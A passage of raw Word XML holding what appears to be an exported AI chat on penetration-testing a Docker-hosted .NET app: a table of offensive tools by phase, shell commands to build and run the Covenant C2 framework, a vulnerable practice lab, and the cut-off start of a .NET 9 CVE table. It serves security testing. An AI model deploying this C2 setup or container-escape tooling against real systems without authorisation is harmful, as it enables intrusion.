          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47822E0B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Alternative Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7EE23F7F">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="282113CE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="180196E9">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>docker CLI, nmap, curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="100730A7">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Burp Suite, Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5463C7F5">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48AADA41">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D83D7D6">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>jwt_tool, Burp Sequencer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25FC1FFC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Postman, custom Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4A34123B">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12FAF1CD">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Web Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="401AF940">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>OWASP ZAP, Burp Suite Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65D8D36E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Nikto, sqlmap, Nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F4CC898">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AAC3128">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Container Escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AE6AF8F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Custom Python (CVE-2025-9074), docker commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EE9ED99">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Metasploit (docker modules)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="641A5366">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FB84A07">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Config Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BFCF470">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>grep, truffleHog, dive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="123A5D4F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>dotPeek, ILSpy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="394BD78B">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60FE56A1">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>C2 / Post-Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="184E51E1">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Covenant (C# C2 framework)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FA7F417">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Metasploit, Cobalt Strike</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D98CA63">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Covenant Setup (For Post-Exploit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5998F81A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C72E9DD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Covenant is a .NET Core C2 framework that supports Docker[citation:5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82BD1E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>git clone https://github.com/cobbr/Covenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E0F14">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>cd Covenant/Covenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB52A4F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker build -t covenant .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202513CF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker run -it -p 7443:7443 -p 80:80 -p 443:443 covenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975B075">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Recommended Lab for Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF648D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a safe environment to practice, use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>AspGoat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> - an intentionally vulnerable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://ASP.NET" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>ASP.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> Core app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC14C37">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495AF66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker pull sohamburger/aspgoat:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D76B897">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker run --rm -p 8000:8000 sohamburger/aspgoat:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E945F36">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Now test at http://localhost:8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1552BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>This covers all phases from initial recon to post-exploitation tools for your Docker-hosted .NET application. Begin with Phase 1 reconnaissance, then move to authentication testing, web attacks, container escape attempts, and finally configuration review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6613F85F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>This response is AI-generated, for reference only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272C3AF1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>I need the most traditional vulnerabilities .net 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DDEEA3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Read 10 web pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18E12B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Here are the most significant vulnerabilities currently affecting .NET 9 applications. These have been identified through official security advisories and are relevant as of 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483156C">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Critical &amp; High Severity Vulnerabilities in .NET 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9B22B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>The following vulnerabilities require immediate attention because they either have a very high CVSS score or have been the subject of recent security updates.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1591"/>
        <w:gridCol w:w="2937"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="2578"/>
      </w:tblGrid>
      <w:tr w14:paraId="4C1BE040">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7194DE9B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Vulnerability (CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="772CC8FB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C273BF3">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
